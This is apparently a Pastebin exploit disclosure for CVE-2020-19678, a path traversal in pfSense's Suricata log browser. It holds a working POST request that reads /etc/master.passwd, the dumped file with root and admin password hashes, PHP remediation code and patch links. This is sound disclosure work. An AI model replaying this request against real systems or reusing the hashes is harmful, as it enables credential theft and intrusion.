CVE-2020-19678: LFI vulnerability in Suricata 1.4.6 on Pfsense 2.1.3 - Pastebin.com

Directory Traversal vulnerability found in Pfsense v.2.1.3 and Pfsense Suricata v.1.4.6 pkg v.1.0.1 allows a remote attacker to obtain sensitive information via the file parameter to suricata/suricata_logs_browser.php.

# Exploit Title: LFI (Local File Inclusion) vulnerability in Suricata 1.4.6 on Pfsense 2.1.3
# Date: 2014-05-21
# Software Link: https://www.pfsense.org/
# Version: 2.1.3
# Vendor: Pfsense
# Exploit Author: Vu Van Hieu - [email protected], Nguyen Quoc Viet - [email protected]
# CVE: CVE-2020-19678
# Category: IDS
# Tested on: Firefox

# Description
# There is an LFI (Local File Inclusion) vulnerability in Suricata 1.4.6 pkg v1.0.1 on Pfsense 2.1.3.
# It allows an attacker to include files on the server through the web browser and read any file on the server.
# The vulnerability allows remote attackers to retrieve arbitrary files via the file parameter to /suricata/suricata_logs_browser.php.

# POC
This is the POST request sent when you access https://Your_Pfsense_Server/suricata/suricata_logs_browser.php. You can modify the "file" parameter to read any file (example: /etc/master.passwd):

+ HTTP POST header:

```
Host: Your_Pfsense_Server
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://Your_Pfsense_Server/suricata/suricata_logs_browser.php
Content-Length: 132
Cookie: cookie_test=1400576638; PHPSESSID=7d20151aeace555ee38d8d923f47c3aa
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

__csrf_magic=sid:4c06775fcb95114389a0da397f509158d261ea54,1400573055&action=load&file=/etc/master.passwd
```

+ The server will respond with Base64-encoded data:

```
|0|/etc/master.passwd|<base64-encoded file contents omitted>|
```

+ Decode the Base64 content:

```
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
root:$1$dSJImFph$GvZ7.1UbuWu.Yb8etC0re.:0:0::0:0:Charlie &:/root:/bin/sh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
dhcpd:*:1002:1002::0:0:DHCP Daemon:/nonexistent:/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
_isakmpd:*:68:68::0:0:isakmpd privsep:/var/empty:/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
_ntp:*:123:123::0:0:NTP daemon:/var/empty:/sbin/nologin
_relayd:*:913:913::0:0:Relay Daemon:/var/empty:/usr/sbin/nologin
admin:$1$dSJImFph$GvZ7.1UbuWu.Yb8etC0re.:0:0::0:0:System Administrator:/root:/etc/rc.initial
test:*LOCKED*$1$Mj1cDit2$AJheYAjUuer0kgTXwzuts/:2000:65534::0:0::/home/test:/sbin/nologin
```
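The root cause described above is a log browser that serves whatever path the "file" value names. As an added example (not pfSense's or the Suricata package's code, and not the fix referenced in the links below), here is a PHP handler for such a browser that accepts only a bare file name inside a fixed log directory; SURICATA_LOG_DIR and the `|status|name|base64|` reply layout are assumptions modelled on the response shown above.

```php
<?php
// Added example, not pfSense/Suricata package code: a log-browser handler
// that only serves files from one fixed directory. SURICATA_LOG_DIR and the
// "|status|name|base64|" reply layout are assumptions for this example.
declare(strict_types=1);

const SURICATA_LOG_DIR = '/var/log/suricata';

/**
 * Return the canonical path of the requested log file, or null unless it is
 * an existing regular file directly inside $baseDir.
 */
function resolve_log_file(string $requested, string $baseDir = SURICATA_LOG_DIR): ?string
{
    // Accept only a bare file name: no "/", "\" or NUL byte anywhere.
    if ($requested === '' || strpbrk($requested, "/\\\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves ".." and symlinks, so a name that is really a
    // symlink to /etc/master.passwd resolves outside $base and is rejected.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Handler: a rejected name produces an error reply with no file content,
// instead of the base64-encoded file the vulnerable browser returned.
$name = is_string($_POST['file'] ?? null) ? $_POST['file'] : '';
$path = resolve_log_file($name);
if ($path === null) {
    http_response_code(400);
    echo '|1|invalid log file||';
    exit;
}
$data = file_get_contents($path);
echo '|0|', basename($path), '|', base64_encode($data === false ? '' : $data), '|';
```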

# REF
https://github.com/pfsense/pfsense-packages/pull/659
https://github.com/pfsense/pfsense-packages/commit/59ed3438729fd56452f58a0f79f0c288db982ac3
http://www.2ngon.com/2015/01/lfi-vulnerability-suricata-146-pkg-v101.html
